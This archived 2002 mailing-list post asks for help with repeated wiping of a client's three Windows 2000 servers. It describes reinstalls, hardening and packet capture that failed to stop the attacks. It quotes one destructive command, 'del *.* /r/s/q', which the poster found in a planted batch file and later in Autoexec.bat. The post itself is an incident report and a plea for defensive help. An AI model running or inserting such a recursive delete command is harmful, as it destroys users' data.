mysterious attack on Windows 2000 servers (Help needed)
From: Manish Jain (manishjn@hotmail.com)
Date: 09/14/02
- Next message: Enkidu: "Re: Cannot Find Logon Server"
- Previous message: Steven L Umbach: "Re: Cannot Find Logon Server"
- Next in thread: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: karl [x y]: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: belgarath: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Manish Jain" <manishjn@hotmail.com> Date: Sat, 14 Sep 2002 13:05:55 -0700
Dear All
>From last few weeks my client is having mysterious attack
on his server. He is having 3 servers on his network and
all of them are running on Windows 2000 Server SP3. One
of the server is Domain Controller and another one is
Mail server running MS Exchange 2000 SP3 and the last one
is the firewall proxy server running MS ISA 2000. He is
connected to other branch offices through IPLC and VSAT
links. The internet gateway is at his head office in
another city.
Now the real problem:
On Aug 16, all his 3 servers got compromised and he found
that all the files from his boot/ system drive has been
deleted. When he rebooted his server he got the message
that NTKRNL32.exe is missing and his servers couldn't
reboot. This happen on all 3 servers. The system
administrator was not much aware of info sec security and
they reinstalled all 3 severs.
Then the same incident happened again on 22 Aug and after
the incident they reinstalled the systems again. Then
they hired me to find out the cause of the problem and
fix it for future prevention. I started analyzing the
network traffic and checked all their system
configuration but I couldn't find any clue on this. Then
on 29th Aug all 3 servers got the same attack again and
all the files from the C:\ (which was the boot and the
system drive) got deleted. I got the snapshot of the
system and after analysis I found that the folder
structure was intact but most of the system critical
files got deleted. I found a batch file in c:\
named "README.BAT". In this file a simple dos command was
written "del *.* /r/s/q". I thought that this will be a
worm and I started searching over the internet about
this. But I couldn't find anything over the internet
related to this kind of incident. Then I did the OS
hardening and updated the system with all latest patches.
I also created a empty file "readme.bat" in c:\ and I
removed all access for this file.
Unfortunately this didn't worked out and all the servers
again got deleted on 2nd Sep. This time the batch file
was not readme.bat but the same del command was written
in Autoexec.bat
I installed the network packet capturing software also
running 24 hrs. I analyzed the packets but I couldn't
find anything. Then the incident happened again on 9 Sep
again and I have no clue what to do now. I have taken all
the precautions I can think of. At last I thought of
disabling the delete command and batch file executions
itself. so that I may stop this incident to happen again.
I request everyone to please suggest me if you know how
can I stop this incident to happen and how to find out
how it is happening. Your help will be much appreciated.
Thanks in advance.
Regards,
Manish Jain
- Next message: Enkidu: "Re: Cannot Find Logon Server"
- Previous message: Steven L Umbach: "Re: Cannot Find Logon Server"
- Next in thread: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: Mark Strelecki, ACP: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: karl [x y]: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Reply: belgarath: "Re: mysterious attack on Windows 2000 servers (Help needed)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
